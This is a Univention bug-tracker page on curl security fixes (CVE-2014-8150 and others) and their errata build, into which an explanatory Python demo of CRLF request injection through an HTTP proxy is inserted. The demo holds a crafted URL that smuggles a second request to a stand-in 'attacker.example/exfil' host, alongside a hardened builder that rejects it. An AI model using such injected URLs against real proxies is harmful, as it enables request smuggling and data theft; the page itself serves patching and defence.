Univention Bugzilla – Bug 36468
curl: Multiple issues (3.2)
Last modified: 2015-06-17 15:26:35 CEST
* Information leak in curl_easy_duphandle() (CVE-2014-3707)
* CVE-2014-8150: When libcurl sends a request to a server via an HTTP proxy, it copies the entire URL into the request and sends it off. If the given URL contains line feeds and carriage returns, those will be sent along to the proxy too, which allows the program to, for example, send a separate HTTP request injected and embedded in the URL.
* Re-using authenticated connection when unauthenticated (CVE-2015-3143)
* Negotiate not treated as connection-oriented (CVE-2015-3148)
Fix available in Debian version 7.21.0-2.1+squeeze12
Followup to Bug 37257
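The CVE-2014-8150 entry above describes a proxy request line built by copying the URL verbatim, so raw CR/LF in the URL become extra request lines on the wire. The following is an added illustration, not curl's source: a toy proxy-request builder in its naive and hardened forms, plus a minimal proxy-side splitter that shows the second request the proxy would see. Host names (target.example, attacker.example) and the URLs are constructed for the demo.

```python
"""CVE-2014-8150-style request injection through an HTTP proxy.

Added illustration, not curl source: a toy model of a client that builds a
proxy request in absolute-URI form, with the URL copied verbatim into the
request line. Host names and URLs below are constructed for the demo.
"""

CRLF = "\r\n"


class UnsafeUrl(ValueError):
    """Raised by the hardened builder when a URL carries a raw CR or LF."""


def build_proxy_request_vulnerable(url: str, host: str) -> bytes:
    """Copy the URL straight into the request line, as the advisory
    describes for libcurl before the fix. Nothing is validated."""
    request = (
        f"GET {url} HTTP/1.1{CRLF}"
        f"Host: {host}{CRLF}"
        f"Accept: */*{CRLF}"
        f"{CRLF}"
    )
    return request.encode("latin-1")


def build_proxy_request_hardened(url: str, host: str) -> bytes:
    """Same builder, but refuse any URL containing a raw CR or LF before it
    can reach the wire. A percent-encoded %0D%0A is not a problem here:
    it stays a literal token in the request line and the proxy does not
    treat it as a line break."""
    if "\r" in url or "\n" in url:
        raise UnsafeUrl("URL contains CR/LF; refusing to build request")
    return build_proxy_request_vulnerable(url, host)


def parse_requests_as_proxy(raw: bytes) -> list[str]:
    """Split a byte stream into requests the way a minimal proxy parser
    would (bodiless requests, so a blank line ends each one) and return
    the request target of each. A demo parser, not a real proxy."""
    targets = []
    for message in raw.split(b"\r\n\r\n"):
        if not message.strip():
            continue
        request_line = message.split(b"\r\n", 1)[0].decode("latin-1")
        _method, target, _version = request_line.split(" ", 2)
        targets.append(target)
    return targets


# Constructed attacker-controlled URL: the CR/LF pairs terminate the first
# request and start a second one addressed to a different origin.
INJECTED_URL = (
    "http://target.example/ HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "\r\n"
    "GET http://attacker.example/exfil"
)
BENIGN_URL = "http://target.example/"


if __name__ == "__main__":
    raw = build_proxy_request_vulnerable(INJECTED_URL, "target.example")
    print("proxy sees:", parse_requests_as_proxy(raw))
    # -> ['http://target.example/', 'http://attacker.example/exfil']
    try:
        build_proxy_request_hardened(INJECTED_URL, "target.example")
    except UnsafeUrl as exc:
        print("hardened builder:", exc)
```

The check belongs at the boundary where untrusted input becomes protocol bytes: rejecting the URL before the request is assembled is simpler and safer than trying to escape CR/LF afterwards, and it is the only place where a library can protect callers that pass unencoded, user-supplied URLs.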
7.21.0-2.1+squeeze12 built as 7.21.0-7.53.201506031709. Advisory: 2015-06-03-curl.yaml
Ok, 7.21.0-2.1+squeeze12 has been imported and built in errata3.2-6.

Package update works:
previous version: libcurl3 7.21.0-6.48.201410151452
new version: libcurl3 7.21.0-7.53.201506031709
(via patches/curl/3.2-0-0-ucs/7.21.0-2.1+squeeze12-errata3.2-6/bump-version.patch)

Version in UCS 4.0-0 is still higher: libcurl3 7.26.0-1.49.201411010317

Advisory is ok, probably we also should add "5" to the updatable versions?:
version: [5,6]
I guess we are still in the 6-week maintenance time frame after a patch level release.

Otherwise ok.
(In reply to Arvid Requate from comment #6)
> version: [5,6]
Changed
<http://errata.univention.de/ucs/3.2/339.html>